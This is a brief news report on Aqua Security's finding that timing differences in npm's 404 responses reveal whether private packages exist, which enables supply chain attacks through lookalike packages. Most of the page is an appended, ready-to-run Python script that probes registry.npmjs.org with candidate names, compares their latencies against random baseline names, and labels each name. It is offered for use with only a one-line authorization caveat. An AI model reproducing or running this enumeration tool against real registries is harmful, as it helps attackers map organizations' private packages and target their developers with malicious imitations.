Aqua Security Warns Timing Attacks Can Be Used for Checking Existence of Private NPM Packages

Aqua Security

Container and cloud-native application security provider Aqua Security warns that the existence of private NPM packages can be disclosed by performing timing attacks.

The company found that an attacker armed with a list of candidate package names can use timing attacks to learn whether an organization has developed private NPM packages under those names. Once the attacker knows that a private package exists, they can mount a supply chain attack by publishing public packages that imitate it and tricking the organization's users and employees into installing them.

According to Aqua, the root cause is that NPM's API answers an unauthenticated request for a private package's details with the same '404 Not Found' it returns for a package that does not exist at all. The status code itself leaks nothing, but the time the registry takes to produce it does, so an attacker who repeatedly requests both kinds of name and compares the response times can tell the two cases apart.
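The probe the article describes, as an added example written for this page and not Aqua Security's tooling: it times unauthenticated GETs against the registry metadata endpoint (assumed here to be https://registry.npmjs.org/<name>) for candidate names, interleaves them with requests for freshly generated random names that certainly do not exist, and compares the two latency distributions with a robust median/MAD statistic so that a few jittery requests cannot flip the verdict. The endpoint, the statistical threshold and the package names are assumptions; the page does not say on which side of the baseline private packages fall, so the comparison is two-sided and must be calibrated against a known case before the verdict is trusted.

```python
"""Probing an npm registry for private packages by timing its 404 responses.

Added illustration for this page, not Aqua Security's code. Assumptions:
the endpoint REGISTRY, the number of rounds and the thresholds in classify()
are mine. The registry answers an unauthenticated GET for a private package
and for a nonexistent package with the same 404; only the latency differs.
"""
import random
import statistics
import string
import time
import urllib.error
import urllib.parse
import urllib.request

REGISTRY = "https://registry.npmjs.org/"  # assumed probe endpoint


def random_name(length=16):
    """A scoped name that, with overwhelming probability, is not on the registry."""
    scope = "".join(random.choices(string.ascii_lowercase, k=8))
    pkg = "".join(random.choices(string.ascii_lowercase, k=length))
    return f"@{scope}/{pkg}"


def probe(name, timeout=10):
    """One unauthenticated GET; returns (http_status, latency_seconds)."""
    url = REGISTRY + urllib.parse.quote(name, safe="@/")
    req = urllib.request.Request(url, headers={"User-Agent": "timing-probe/0.1"})
    t0 = time.perf_counter()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status = resp.status
    except urllib.error.HTTPError as err:
        status = err.code
    return status, time.perf_counter() - t0


def classify(target_samples, baseline_samples, k=3.0, min_effect=0.15):
    """Two-sided robust comparison of a candidate's 404 latencies with those
    of names known not to exist.

    Medians and MAD replace mean and stddev so a handful of slow outliers from
    network jitter cannot flip the verdict. Returns ("distinct" |
    "indistinguishable", z) where z is the median shift measured in robust
    standard deviations of the baseline; |z| >= k and a relative shift of at
    least min_effect are both required to call the name "distinct".
    """
    med_t = statistics.median(target_samples)
    med_b = statistics.median(baseline_samples)
    mad_b = statistics.median(abs(x - med_b) for x in baseline_samples)
    sigma = 1.4826 * max(mad_b, 1e-4)   # floor of 0.1 ms avoids dividing by ~0
    z = (med_t - med_b) / sigma
    effect = abs(med_t - med_b) / med_b  # guards against tiny but steady shifts
    if abs(z) >= k and effect >= min_effect:
        return "distinct", z
    return "indistinguishable", z


def check_names(candidates, rounds=10):
    """Interleave probes of candidate names with probes of random names so that
    drift in registry or network latency hits both groups equally.
    Returns {name: (verdict, z)}; a 200 means the package is simply public."""
    latencies = {name: [] for name in candidates}
    public = set()
    baseline = []
    for _ in range(rounds):
        order = list(candidates)
        random.shuffle(order)
        for name in order:
            status, dt = probe(name)
            if status == 200:
                public.add(name)
            elif status == 404:
                latencies[name].append(dt)
            # A fresh random name each time, so no cached answer skews the baseline.
            status_b, dt_b = probe(random_name())
            if status_b == 404:
                baseline.append(dt_b)
    results = {}
    for name in candidates:
        if name in public:
            results[name] = ("public", 0.0)
        elif latencies[name] and baseline:
            results[name] = classify(latencies[name], baseline)
        else:
            results[name] = ("no-data", 0.0)
    return results


if __name__ == "__main__":
    # Network access required; the package name is a placeholder.
    for name, (verdict, z) in check_names(["@example-org/internal-auth"]).items():
        print(f"{name}: {verdict} (z={z:.1f})")
```

Run it only against a registry you are authorized to test, and expect rate limiting on unauthenticated bursts; ten rounds per name is a starting point, and the z-score it reports is the evidence to inspect rather than the verdict alone.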

Read More: Timing Attacks Can Be Used to Check for Existence of Private NPM Packages
